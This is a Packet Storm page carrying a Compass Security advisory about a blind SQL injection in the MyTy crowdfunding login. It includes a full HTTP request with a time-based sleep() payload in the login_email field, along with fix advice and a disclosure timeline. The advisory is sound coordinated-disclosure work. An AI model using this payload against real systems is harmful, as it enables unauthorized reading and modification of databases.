Twenty Year Anniversary

MyTy 5.1.6 Blind SQL Injection

MyTy 5.1.6 Blind SQL Injection
Posted Nov 22, 2017
Authored by Nicolas Heiniger

MyTy versions 5.0.4 through 5.1.6 suffer from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | a13e0672e0e99854524ab58771d7fa5a

MyTy 5.1.6 Blind SQL Injection

Change Mirror Download
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: MyTy
# Vendor: Finlane GmbH
# CSNC ID: CSNC-2017-029
# CVE ID: -
# Subject: Blind SQL injection
# Risk: High
# Effect: Remotely exploitable
# Author: Nicolas Heiniger <nicolas.heiniger@compass-security.com>
# Date: 21.11.2017
#
#############################################################

Introduction:
-------------
MyTy[1] is a software framework that includes a crowdfunding module. It can be
installed on a customer server and used to create whitelabel websites for
crowdfunding platforms.

Compass Security discovered a web application security flaw in the crowdfunding
module login process that allows an unauthenticated attacker to execute
arbitrary SQL query against the database. This allows to read and modify the
whole database, within the privilege limitations of the database user executing
the queries.


Affected:
---------
Vulnerable:
* MyTy 5.0.4 to 5.1.6


Technical Description
---------------------
During the login process, the user email and password are sent in a POST
request. In this request, the login_email parameter is concatenated into an SQL
query in a way that allows for SQL injection.

This was first discovered as a time-based blind injection with the following
request:
===============
POST /tycon/modules/crowdfunding/mvc/controller/ajax/user/login/show.php?popin=1
&type=simpleLogin&activeTab=0 HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: [CUT BY COMPASS]
Content-Length: 154
Cookie: tyFl=de_de; XSRF-TOKEN=oBwu%2BTWkisoYIpFEzoHDdSceUSflgjymh2uN1wXxZKg%3D;
lang=de; PHPSESSID=e1e71aroeb557v412tov9fu574; tyBl=en_us; cfce=1;
_ga=GA1.2.75537659.1504612703; _gid=GA1.2.1847726517.1504612703;
cf_cookie_policy_read=1; _gat=1
CSNC-HEN: Pentest1-Blue
Connection: close

login=1&callback=&redirect=&fwd=%252Fprojekte%252Fsuchergebnisse.html%253F
&login_type=inline&popin=1&type=simpleLogin
&login_email=test'%2b(select*from(select(sleep(20)))a)%2b'&login_password=1234
===============


Workaround / Fix:
-----------------
Install an up to date version of the MyTy software.

As a developer:
Strictly use prepared statements in order to protect the application from SQL
injection.

Optional addition:
Validate all user input and filter dangerous characters, which can cause a
change of the context and have to be filtered, cut or escaped e.g. " ' -- () ;


Timeline:
---------
2017-11-21: Coordinated public disclosure date
2017-09-06: Release of fix in versions 5.0.12 and 5.1.7
2017-09-06: Initial vendor response
2017-09-06: Initial vendor notification
2017-09-06: Discovery by Nicolas Heiniger


References:
-----------
[1] https://www.finlane.com/loesungen/whitelabel-pages/
[2] https://github.com/sqlmapproject/sqlmap

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

May 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    17 Files
  • 3
    May 3rd
    30 Files
  • 4
    May 4th
    29 Files
  • 5
    May 5th
    2 Files
  • 6
    May 6th
    3 Files
  • 7
    May 7th
    13 Files
  • 8
    May 8th
    27 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    15 Files
  • 11
    May 11th
    8 Files
  • 12
    May 12th
    2 Files
  • 13
    May 13th
    8 Files
  • 14
    May 14th
    7 Files
  • 15
    May 15th
    43 Files
  • 16
    May 16th
    19 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    3 Files
  • 20
    May 20th
    6 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    3 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close